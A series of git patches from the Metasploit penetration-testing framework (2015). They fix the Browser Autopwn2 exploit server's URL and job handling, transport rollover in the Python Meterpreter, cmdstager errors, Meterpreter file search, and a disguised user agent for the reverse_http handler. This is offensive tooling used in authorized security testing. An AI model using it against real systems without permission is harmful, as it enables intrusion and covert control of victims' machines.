+          Date.parse(dstr) rescue Date.parse("1970-01-01")
+        }.reverse
       end
     end
 
@@ -337,8 +339,9 @@ module Msf
         # Configurable only by BAP
         multi_handler.datastore['ExitOnSession'] = false
         multi_handler.datastore['EXITFUNC']      = 'thread'
-        multi_handler.datastore['WORKSPACE']     = self.workspace
 
+        # Register this module as a child and copy datastore options
+        multi_handler.register_parent(self)
 
         # Now we're ready to start the handler
         multi_handler.exploit_simple(

From 2264efac158b0440230a5f4118f0aab685a97141 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 12:22:38 -0500
Subject: [PATCH 0768/1013] Reduce output

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 2216a4242c..3a5e1e6358 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -140,6 +140,7 @@ module Msf
       xploit.datastore['DisablePayloadHandler'] = true
       xploit.datastore['BrowserProfilePrefix']  = browser_profile_prefix
       xploit.datastore['URIPATH']               = "/#{assign_module_resource}"
+      xploit.datastore['WORKSPACE']             = self.workspace
 
       # Register this module as a child and copy datastore options
       xploit.register_parent(self)
@@ -156,6 +157,7 @@ module Msf
 
       bap_exploits.each do |m|
         # Prevent partial matching of one resource within another
+        next unless m.datastore['URIPATH']
         return true if m.datastore['URIPATH'].index(resource)
         return true if resource.index(m.datastore['URIPATH'])
       end
@@ -339,6 +341,7 @@ module Msf
         # Configurable only by BAP
         multi_handler.datastore['ExitOnSession'] = false
         multi_handler.datastore['EXITFUNC']      = 'thread'
+        multi_handler.datastore['WORKSPACE']     = self.workspace
 
         # Register this module as a child and copy datastore options
         multi_handler.register_parent(self)

From 9dddb13d0b47ab51432fc176aa081925ef6ae944 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 13:10:57 -0500
Subject: [PATCH 0769/1013] Slow down on killing exploits

Jobs aren't thread safe, so we kind of have to take it easy.
---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 3a5e1e6358..6c9af0992b 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -87,6 +87,7 @@ module Msf
     def rm_exploit_jobs
       exploit_job_ids.each do |id|
         framework.jobs.stop_job(id) if framework.jobs[id.to_s]
+        sleep(0.1)
       end
     end
 
@@ -107,6 +108,7 @@ module Msf
     # @see #Msf::Exploit::Remote::BrowserProfileManager#clear_browser_profiles The method for removing target information.
     # @return [void]
     def cleanup
+      print_status("Cleaning up jobs...")
       super
       configure_job_output(false)
       clear_browser_profiles

From 9f48853e006a41f0f5763a1e188a2454f12f0c86 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 14 Jul 2015 14:26:27 -0400
Subject: [PATCH 0770/1013] Pymet fix the order in which transports are added

---
 data/meterpreter/meterpreter.py | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 11847bc36b..faa2fa3545 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -870,7 +870,9 @@ class PythonMeterpreter(object):
 		return ERROR_SUCCESS, response
 
 	def _core_transport_add(self, request, response):
-		self.transports.append(Transport.from_request(request))
+		new_transport = Transport.from_request(request)
+		new_position = self.transports.index(self.transport) + 1
+		self.transports.insert(new_position, new_transport)
 		return ERROR_SUCCESS, response
 
 	def _core_transport_change(self, request, response):

From 00da6195562590f57403499b8fb9f5aca15fbf06 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 14 Jul 2015 14:32:57 -0400
Subject: [PATCH 0771/1013] Pymet fix previous transport index logic

---
 data/meterpreter/meterpreter.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index faa2fa3545..f9e56a718e 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -732,7 +732,7 @@ class PythonMeterpreter(object):
 		if current_transport is None:
 			current_transport = self.transport
 		new_idx = self.transports.index(current_transport) - 1
-		if new_idx == 0:
+		if new_idx == -1:
 			new_idx = len(self.transports) - 1
 		return self.transports[new_idx]
 

From 9be030bbff64b1a430eb1830c2cb92a97a3b0803 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 14 Jul 2015 18:43:47 +0000
Subject: [PATCH 0772/1013] Fix nil in executable generation

---
 lib/msf/core/exploit/cmdstager.rb | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 692f4fda2c..865122bfb4 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -108,18 +108,21 @@ module Exploit::CmdStager
   # @option opts :decoder [Symbol] The decoder stub to use.
   # @param pl [String] String containing the payload to execute
   # @return [Array] The list of commands to execute
-  # @raise [ArgumentError] raised if the cmd stub cannot be generated
+  # @raise [ArgumentError] raised if the exe or cmd stub cannot be generated
   def generate_cmdstager(opts = {}, pl = nil)
     select_cmdstager(opts)
 
     self.exe = generate_payload_exe(:code => pl)
 
+    if exe.nil?
+      raise ArgumentError, 'The executable could not be generated'
+    end
+
     self.stager_instance = create_stager
     cmd_list = stager_instance.generate(opts_with_decoder(opts))
 
-    if (cmd_list.nil? || cmd_list.length < 1)
-      print_error("The command stager could not be generated")
-      raise ArgumentError
+    if cmd_list.nil? || cmd_list.length.zero?
+      raise ArgumentError, 'The command stager could not be generated'
     end
 
     cmd_list

From f76fe0787279d24681905a54d9d13f42a9399db7 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 13:49:28 -0500
Subject: [PATCH 0773/1013] Fix SRVHOST

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 6c9af0992b..bde7c76d6c 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -654,7 +654,7 @@ module Msf
 
       exploit_list.each do |mod|
         proto = datastore['SSL'] ? 'https' : 'http'
-        host = datastore['URIHOST'] || Rex::Socket.source_address
+        host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
         port = datastore['SRVPORT']
         resource = mod.datastore['URIPATH']
         url = "#{proto}://#{host}:#{port}#{resource}"

From 9980e8f28532b65c4b10add316dc7b7c38927698 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 14:06:33 -0500
Subject: [PATCH 0774/1013] Change SRVHOST vs URIHOST vs Rex again

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index bde7c76d6c..cd81f661d9 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -654,7 +654,7 @@ module Msf
 
       exploit_list.each do |mod|
         proto = datastore['SSL'] ? 'https' : 'http'
-        host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+        host = datastore['URIHOST'] || datastore['SRVHOST'] || Rex::Socket.source_address
         port = datastore['SRVPORT']
         resource = mod.datastore['URIPATH']
         url = "#{proto}://#{host}:#{port}#{resource}"

From 8efb4df8af8073431edd08dfe338c2c5c3e43324 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 14:15:32 -0500
Subject: [PATCH 0775/1013] Change the HOST IP logic again

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index cd81f661d9..e1194ba093 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -654,7 +654,16 @@ module Msf
 
       exploit_list.each do |mod|
         proto = datastore['SSL'] ? 'https' : 'http'
-        host = datastore['URIHOST'] || datastore['SRVHOST'] || Rex::Socket.source_address
+        host = ''
+        if datastore['URIHOST']
+          host = datastore['URIHOST']
+        elsif cli
+          host = cli.peerhost
+        elsif datastore['SRVHOST'] != '0.0.0.0'
+          host = datastore['SRVHOST']
+        else
+          host = Rex::Socket.source_address
+        end
         port = datastore['SRVPORT']
         resource = mod.datastore['URIPATH']
         url = "#{proto}://#{host}:#{port}#{resource}"

From 61d49f29e83b1b75a30cf6c634802eb76daad5ba Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 14:16:49 -0500
Subject: [PATCH 0776/1013] Check nil for SRVHOST option

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index e1194ba093..94ad8fe4d4 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -659,7 +659,7 @@ module Msf
           host = datastore['URIHOST']
         elsif cli
           host = cli.peerhost
-        elsif datastore['SRVHOST'] != '0.0.0.0'
+        elsif datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
           host = datastore['SRVHOST']
         else
           host = Rex::Socket.source_address

From 18cb55f1fad454cecc1aa5f07ed420ee88e1db6c Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 14 Jul 2015 15:18:11 -0400
Subject: [PATCH 0777/1013] Pymet fix transport automatic roll over

---
 data/meterpreter/meterpreter.py | 51 ++++++++++++++++++---------------
 1 file changed, 28 insertions(+), 23 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index f9e56a718e..c8c37c00d3 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -469,9 +469,10 @@ class Transport(object):
 			pkt = self._get_packet()
 		except:
 			return None
+		if pkt is None:
+			return None
 		self.communication_last = time.time()
-		if pkt:
-			self.communication_active = True
+		self.communication_active = True
 		return pkt
 
 	def send_packet(self, pkt):
@@ -536,11 +537,13 @@ class HttpTransport(Transport):
 		request = urllib.Request(self.url, bytes('RECV', 'UTF-8'), self._http_request_headers)
 		url_h = urllib.urlopen(request, timeout=self.communication_timeout)
 		packet = url_h.read()
-		if not packet or len(packet) < 8:
-			return None
+		if packet == '':
+			return ''
+		if len(packet) < 8:
+			return None  # looks corrupt
 		pkt_length, _ = struct.unpack('>II', packet[:8])
 		if len(packet) != pkt_length:
-			return None
+			return None  # looks corrupt
 		return packet[8:]
 
 	def _send_packet(self, packet):
@@ -609,26 +612,28 @@ class TcpTransport(Transport):
 		self.socket = None
 
 	def _get_packet(self):
-		packet = None
 		first = self._first_packet
 		self._first_packet = False
-		if select.select([self.socket], [], [], 0.5)[0]:
-			packet = self.socket.recv(8)
-			if len(packet) != 8:
-				if first and len(packet) == 4:
-					received = 0
-					pkt_length = struct.unpack('>I', packet)[0]
-					self.socket.settimeout(max(self.communication_timeout, 30))
-					while received < pkt_length:
-						received += len(self.socket.recv(pkt_length - received))
-					self.socket.settimeout(None)
-					return self._get_packet()
-				return None
-			pkt_length, pkt_type = struct.unpack('>II', packet)
-			pkt_length -= 8
-			packet = bytes()
-			while len(packet) < pkt_length:
-				packet += self.socket.recv(pkt_length - len(packet))
+		if not select.select([self.socket], [], [], 0.5)[0]:
+			return ''
+		packet = self.socket.recv(8)
+		if packet == '':  # remote is closed
+			return None
+		if len(packet) != 8:
+			if first and len(packet) == 4:
+				received = 0
+				pkt_length = struct.unpack('>I', packet)[0]
+				self.socket.settimeout(max(self.communication_timeout, 30))
+				while received < pkt_length:
+					received += len(self.socket.recv(pkt_length - received))
+				self.socket.settimeout(None)
+				return self._get_packet()
+			return None
+		pkt_length, pkt_type = struct.unpack('>II', packet)
+		pkt_length -= 8
+		packet = bytes()
+		while len(packet) < pkt_length:
+			packet += self.socket.recv(pkt_length - len(packet))
 		return packet
 
 	def _send_packet(self, packet):

From cf714fe4aabf3df441328ce320e618597ad00e5b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 14:19:00 -0500
Subject: [PATCH 0778/1013] Change port logic too

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 94ad8fe4d4..2c52def0c0 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -664,7 +664,7 @@ module Msf
         else
           host = Rex::Socket.source_address
         end
-        port = datastore['SRVPORT']
+        port = datastore['URIPORT'] || datastore['SRVPORT']
         resource = mod.datastore['URIPATH']
         url = "#{proto}://#{host}:#{port}#{resource}"
         urls << url

From 5e63b5f93ee46c01abfbddd56e2865ca00e5b05b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 14:37:45 -0500
Subject: [PATCH 0779/1013] Can't use cli

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 2c52def0c0..18eca7c0db 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -657,8 +657,6 @@ module Msf
         host = ''
         if datastore['URIHOST']
           host = datastore['URIHOST']
-        elsif cli
-          host = cli.peerhost
         elsif datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
           host = datastore['SRVHOST']
         else

From d64f4be6914986df63e0f399bcc58472d4f0ea09 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 14:45:10 -0500
Subject: [PATCH 0780/1013] Check if URIPORT is 0

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 18eca7c0db..9e41438f23 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -662,7 +662,7 @@ module Msf
         else
           host = Rex::Socket.source_address
         end
-        port = datastore['URIPORT'] || datastore['SRVPORT']
+        port = datastore['URIPORT'] == 0 ? datastore['SRVPORT'] : datastore['URIPORT']
         resource = mod.datastore['URIPATH']
         url = "#{proto}://#{host}:#{port}#{resource}"
         urls << url

From 1992a5648d228394ccae1d84f1baf5d1243a66e7 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 15:09:23 -0500
Subject: [PATCH 0781/1013] Make up our damn mind

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 9e41438f23..65336a55fd 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -563,6 +563,7 @@ module Msf
       proto = (datastore['SSL'] ? "https" : "http")
       srvhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
       srvport = datastore['SRVPORT']
+      port = datastore['URIPORT'] == 0 ? datastore['SRVPORT'] : datastore['URIPORT']
       service_uri = "#{proto}://#{srvhost}:#{srvport}#{get_resource}"
       print_status("Please use the following URL for the browser attack:")
       print_status("BrowserAutoPwn URL: #{service_uri}")
@@ -654,15 +655,15 @@ module Msf
 
       exploit_list.each do |mod|
         proto = datastore['SSL'] ? 'https' : 'http'
+        # We haven't URIHOST and URIPORT into account here because
+        # the framework uses them only on `get_uri`
         host = ''
-        if datastore['URIHOST']
-          host = datastore['URIHOST']
-        elsif datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
+        if datastore['SRVHOST'] && datastore['SRVHOST'] != '0.0.0.0'
           host = datastore['SRVHOST']
         else
           host = Rex::Socket.source_address
         end
-        port = datastore['URIPORT'] == 0 ? datastore['SRVPORT'] : datastore['URIPORT']
+        port = datastore['SRVPORT']
         resource = mod.datastore['URIPATH']
         url = "#{proto}://#{host}:#{port}#{resource}"
         urls << url

From 6685fc479bc9840e87e800564f3c583212794d5d Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Tue, 14 Jul 2015 20:16:52 +0000
Subject: [PATCH 0782/1013] Add multi-glob filesystem search to Meterpreter

---
 .../console/command_dispatcher/stdapi/fs.rb   | 36 ++++++++++---------
 1 file changed, 20 insertions(+), 16 deletions(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
index 3b05a90acf..272b4fc6c2 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
@@ -114,50 +114,54 @@ class Console::CommandDispatcher::Stdapi::Fs
   def cmd_search(*args)
 
     root    = nil
-    glob    = nil
     recurse = true
+    globs   = []
+    files   = []
 
     opts = Rex::Parser::Arguments.new(
       "-h" => [ false, "Help Banner." ],
       "-d" => [ true,  "The directory/drive to begin searching from. Leave empty to search all drives. (Default: #{root})" ],
-      "-f" => [ true,  "The file pattern glob to search for. (e.g. *secret*.doc?)" ],
+      "-f" => [ true,  "A file pattern glob to search for. (e.g. *secret*.doc?)" ],
       "-r" => [ true,  "Recursivly search sub directories. (Default: #{recurse})" ]
     )
 
     opts.parse(args) { | opt, idx, val |
       case opt
         when "-h"
-          print_line("Usage: search [-d dir] [-r recurse] -f pattern")
+          print_line("Usage: search [-d dir] [-r recurse] -f pattern [-f pattern]...")
           print_line("Search for files.")
           print_line(opts.usage)
           return
         when "-d"
           root = val
         when "-f"
-          glob = val
+          globs << val
         when "-r"
           recurse = false if val =~ /^(f|n|0)/i
       end
     }
 
-    if not glob
+    if globs.empty?
       print_error("You must specify a valid file glob to search for, e.g. >search -f *.doc")
       return
     end
 
-    files = client.fs.file.search(root, glob, recurse)
+    globs.each do |glob|
+      files += client.fs.file.search(root, glob, recurse)
+    end
 
-    if not files.empty?
-      print_line("Found #{files.length} result#{ files.length > 1 ? 's' : '' }...")
-      files.each do | file |
-        if file['size'] > 0
-          print("    #{file['path']}#{ file['path'].empty? ? '' : '\\' }#{file['name']} (#{file['size']} bytes)\n")
-        else
-          print("    #{file['path']}#{ file['path'].empty? ? '' : '\\' }#{file['name']}\n")
-        end
-      end
-    else
+    if files.empty?
       print_line("No files matching your search were found.")
+      return
+    end
+
+    print_line("Found #{files.length} result#{ files.length > 1 ? 's' : '' }...")
+    files.each do | file |
+      if file['size'] > 0
+        print("    #{file['path']}#{ file['path'].empty? ? '' : '\\' }#{file['name']} (#{file['size']} bytes)\n")
+      else
+        print("    #{file['path']}#{ file['path'].empty? ? '' : '\\' }#{file['name']}\n")
+      end
     end
 
   end

From 219d0032fac4c143455c807b9a076e4a7c87180c Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 15:36:35 -0500
Subject: [PATCH 0783/1013] Do print_good to make this important stand up more

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 65336a55fd..6937605257 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -565,8 +565,8 @@ module Msf
       srvport = datastore['SRVPORT']
       port = datastore['URIPORT'] == 0 ? datastore['SRVPORT'] : datastore['URIPORT']
       service_uri = "#{proto}://#{srvhost}:#{srvport}#{get_resource}"
-      print_status("Please use the following URL for the browser attack:")
-      print_status("BrowserAutoPwn URL: #{service_uri}")
+      print_good("Please use the following URL for the browser attack:")
+      print_good("BrowserAutoPwn URL: #{service_uri}")
     end
 
 

From a7d866bc83c5d1f9a375af24bc76ff5a9907209b Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Tue, 14 Jul 2015 15:45:52 -0600
Subject: [PATCH 0784/1013] specify the 'Arch' values that psexec supports

---
 modules/exploits/windows/smb/psexec.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb
index a0583554d6..f99288beef 100644
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -57,6 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
           'StackAdjustment' => -3500
         },
       'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
       'Targets'        =>
         [
           [ 'Automatic', { } ],

From 709676e6cc877b82ebae3308a80282765ba7867a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 14 Jul 2015 17:00:44 -0500
Subject: [PATCH 0785/1013] Make exploits quiet

---
 lib/msf/core/exploit/browser_autopwnv2.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 6937605257..47a91d587c 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -458,6 +458,7 @@ module Msf
         m.exploit_simple(
           'LocalInput'  => nil,
           'LocalOutput' => nil,
+          'Quiet'       => true,
           'Target'      => 0,
           'Payload'     => m.datastore['PAYLOAD'],
           'RunAsJob'    => true

From 4f8f6401891820c33dac7ca65ee4cd18b6231ee7 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 14 Jul 2015 17:38:51 -0500
Subject: [PATCH 0786/1013] Rename autopwnv2 to just autopwn2

---
 .../exploit/{browser_autopwnv2.rb => browser_autopwn2.rb}     | 4 ++--
 lib/msf/core/exploit/mixins.rb                                | 2 +-
 modules/auxiliary/server/browser_autopwn2.rb                  | 2 +-
 .../{browser_autopwnv2_spec.rb => browser_autopwn2_spec.rb}   | 2 +-
 4 files changed, 5 insertions(+), 5 deletions(-)
 rename lib/msf/core/exploit/{browser_autopwnv2.rb => browser_autopwn2.rb} (99%)
 rename spec/lib/msf/core/exploit/{browser_autopwnv2_spec.rb => browser_autopwn2_spec.rb} (99%)

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwn2.rb
similarity index 99%
rename from lib/msf/core/exploit/browser_autopwnv2.rb
rename to lib/msf/core/exploit/browser_autopwn2.rb
index 47a91d587c..7559adb18e 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwn2.rb
@@ -1,6 +1,6 @@
 ###
 #
-# The Msf::Exploit::Remote::BrowserAutopwnv2 mixin is a replacement for the current BrowserAutoPwn.
+# The Msf::Exploit::Remote::BrowserAutopwn2 mixin is a replacement for the current BrowserAutoPwn.
 # It works with other components such as BrowserExploitServer, BrowserProfileManager, and BES-based
 # exploits to perform a faster and smarter automated client-side attack.
 #
@@ -9,7 +9,7 @@
 require 'date'
 
 module Msf
-  module Exploit::Remote::BrowserAutopwnv2
+  module Exploit::Remote::BrowserAutopwn2
 
     include Msf::Exploit::Remote::BrowserExploitServer
 
diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb
index 80afde7037..a575d03a83 100644
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -104,4 +104,4 @@ require 'msf/core/exploit/android'
 
 # Browser Exploit Server
 require 'msf/core/exploit/remote/browser_exploit_server'
-require 'msf/core/exploit/browser_autopwnv2'
+require 'msf/core/exploit/browser_autopwn2'
diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb
index e514547b7d..382e6007e9 100644
--- a/modules/auxiliary/server/browser_autopwn2.rb
+++ b/modules/auxiliary/server/browser_autopwn2.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
-  include Msf::Exploit::Remote::BrowserAutopwnv2
+  include Msf::Exploit::Remote::BrowserAutopwn2
 
   def initialize(info={})
     super(update_info(info,
diff --git a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb b/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb
similarity index 99%
rename from spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
rename to spec/lib/msf/core/exploit/browser_autopwn2_spec.rb
index 0a85f94d56..97626b61d3 100644
--- a/spec/lib/msf/core/exploit/browser_autopwnv2_spec.rb
+++ b/spec/lib/msf/core/exploit/browser_autopwn2_spec.rb
@@ -1,6 +1,6 @@
 require 'msf/core'
 
-describe Msf::Exploit::Remote::BrowserAutopwnv2 do
+describe Msf::Exploit::Remote::BrowserAutopwn2 do
 
 
 

From b6e25506d0572121046297189697a2526de75cd5 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 15 Jul 2015 12:58:49 +1000
Subject: [PATCH 0787/1013] Add a common user agent list, use the shortest for
 Meterpreter

---
 lib/msf/core/handler/reverse_http.rb          |  54 ++++----
 lib/rex/user_agent.rb                         | 118 ++++++++++++++++++
 .../payloads/stagers/python/reverse_http.rb   |   2 +-
 .../payloads/stagers/python/reverse_https.rb  |   2 +-
 4 files changed, 146 insertions(+), 30 deletions(-)
 create mode 100644 lib/rex/user_agent.rb

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index b0bf70d9e5..665f9125b3 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -5,6 +5,7 @@ require 'rex/payloads/meterpreter/uri_checksum'
 require 'rex/post/meterpreter'
 require 'rex/parser/x509_certificate'
 require 'msf/core/payload/windows/verify_ssl'
+require 'rex/user_agent'
 
 module Msf
 module Handler
@@ -24,7 +25,7 @@ module ReverseHttp
   # Returns the string representation of the handler type
   #
   def self.handler_type
-    return "reverse_http"
+    return 'reverse_http'
   end
 
   #
@@ -43,19 +44,19 @@ module ReverseHttp
 
     register_options(
       [
-        OptString.new('LHOST', [ true, "The local listener hostname" ]),
-        OptPort.new('LPORT', [ true, "The local listener port", 8080 ])
+        OptString.new('LHOST', [true, 'The local listener hostname']),
+        OptPort.new('LPORT', [true, 'The local listener port', 8080])
       ], Msf::Handler::ReverseHttp)
 
     register_advanced_options(
       [
-        OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
-        OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
-        OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
-        OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
-        OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
-        OptBool.new('OverrideRequestHost', [ false, 'Forces clients to connect to LHOST:LPORT instead of keeping original payload host', false ]),
-        OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ]),
+        OptString.new('ReverseListenerComm', [false, 'The specific communication channel to use for this listener']),
+        OptString.new('MeterpreterUserAgent', [false, 'The user-agent that the payload should use for communication', Rex::UserAgent.shortest]),
+        OptString.new('MeterpreterServerName', [false, 'The server header that the handler will send in response to requests', 'Apache']),
+        OptAddress.new('ReverseListenerBindAddress', [false, 'The specific IP address to bind to on the local system']),
+        OptInt.new('ReverseListenerBindPort', [false, 'The port to bind to on the local system if different from LPORT']),
+        OptBool.new('OverrideRequestHost', [false, 'Forces clients to connect to LHOST:LPORT instead of keeping original payload host', false]),
